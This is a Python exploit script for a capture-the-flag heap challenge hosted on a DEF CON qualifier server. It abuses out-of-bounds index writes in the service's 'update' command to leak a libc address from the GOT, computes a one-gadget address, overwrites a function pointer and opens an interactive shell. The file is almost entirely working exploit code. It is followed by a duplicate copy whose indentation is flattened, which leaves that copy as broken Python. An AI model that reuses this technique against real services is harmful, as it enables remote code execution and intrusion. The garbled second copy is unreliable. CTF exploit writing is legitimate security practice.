agix/heapsoffun_0daysober_exploit.py

## heapsoffun_0daysober_exploit.py
import struct
import re
import telnetlib

def read_until(s, stop):
    res = ''

    while not res.endswith(stop):
        res += s.recv(1)

    return res

def toggle(s):
    read_until(s, '> ')
    s.sendall('toggle\n')

def select(s):
    read_until(s, '> ')
    s.sendall('select\n')

def bilan(s):
    read_until(s, '> ')
    s.sendall('bilan\n')

def accumuler(s, size):
    read_until(s, '> ')
    s.sendall('accumuler\n')
    read_until(s, 'Length: ')
    s.sendall('%d\n'%size)
    read_until(s, 'Data: ')
    s.sendall('a'*size+'\n')

def update(s, index, byte, value):
    read_until(s, '> ')
    s.sendall('update\n')
    read_until(s, 'Index: ')
    s.sendall('%d\n'%index)
    read_until(s, 'Byte: ')
    s.sendall('%d\n'%byte)
    read_until(s, 'Value: ')
    s.sendall('%d\n'%value)


def leaktime(addr):
    a=0
    for i in struct.pack('<Q', addr):
        update(s, 2, -76+a, ord(i))
        a+=1

    bilan(s)

    read_until(s, 'Data: ')
    read_until(s, 'Data: ')
    leak = read_until(s, 'Id')

    content = struct.unpack('<Q', leak[:8])[0]

    return content

HOST = "knockedupd_71a592a753bf9dcd7d7ad5fa69b2bab3.quals.shallweplayaga.me"
# HOST = "127.0.0.1"

PORT = 9889

tn = telnetlib.Telnet(HOST, PORT)
s = tn.get_socket()

toggle(s)
accumuler(s, 16)
accumuler(s, 16)
accumuler(s, 16)
update(s, 2, -76, 12)
bilan(s)
read_until(s, 'Data: ')
read_until(s, 'Data: ')
leak = read_until(s, 'Id')

(accumuler_add, bilan_add) = struct.unpack('<QQ', leak[:16])

GOT_libc_start_main_offset = 0x204ed8
libc_start_main_base_offset = 0x21dd0
onegadget_offset = 0x464f9

libc_start_main = leaktime(accumuler_add+GOT_libc_start_main_offset)
onegadget = libc_start_main - libc_start_main_base_offset + onegadget_offset

a=0
for i in struct.pack('<Q', onegadget):
    update(s, 0, -64+a, ord(i))
    a+=1

select(s)

tn.interact()
	import struct
	import re
	import telnetlib

	def read_until(s, stop):
	res = ''

	while not res.endswith(stop):
	res += s.recv(1)

	return res

	def toggle(s):
	read_until(s, '> ')
	s.sendall('toggle\n')

	def select(s):
	read_until(s, '> ')
	s.sendall('select\n')

	def bilan(s):
	read_until(s, '> ')
	s.sendall('bilan\n')

	def accumuler(s, size):
	read_until(s, '> ')
	s.sendall('accumuler\n')
	read_until(s, 'Length: ')
	s.sendall('%d\n'%size)
	read_until(s, 'Data: ')
	s.sendall('a'*size+'\n')

	def update(s, index, byte, value):
	read_until(s, '> ')
	s.sendall('update\n')
	read_until(s, 'Index: ')
	s.sendall('%d\n'%index)
	read_until(s, 'Byte: ')
	s.sendall('%d\n'%byte)
	read_until(s, 'Value: ')
	s.sendall('%d\n'%value)


	def leaktime(addr):
	a=0
	for i in struct.pack('<Q', addr):
	update(s, 2, -76+a, ord(i))
	a+=1

	bilan(s)

	read_until(s, 'Data: ')
	read_until(s, 'Data: ')
	leak = read_until(s, 'Id')

	content = struct.unpack('<Q', leak[:8])[0]

	return content

	HOST = "knockedupd_71a592a753bf9dcd7d7ad5fa69b2bab3.quals.shallweplayaga.me"
	# HOST = "127.0.0.1"

	PORT = 9889

	tn = telnetlib.Telnet(HOST, PORT)
	s = tn.get_socket()

	toggle(s)
	accumuler(s, 16)
	accumuler(s, 16)
	accumuler(s, 16)
	update(s, 2, -76, 12)
	bilan(s)
	read_until(s, 'Data: ')
	read_until(s, 'Data: ')
	leak = read_until(s, 'Id')

	(accumuler_add, bilan_add) = struct.unpack('<QQ', leak[:16])

	GOT_libc_start_main_offset = 0x204ed8
	libc_start_main_base_offset = 0x21dd0
	onegadget_offset = 0x464f9

	libc_start_main = leaktime(accumuler_add+GOT_libc_start_main_offset)
	onegadget = libc_start_main - libc_start_main_base_offset + onegadget_offset

	a=0
	for i in struct.pack('<Q', onegadget):
	update(s, 0, -64+a, ord(i))
	a+=1

	select(s)

	tn.interact()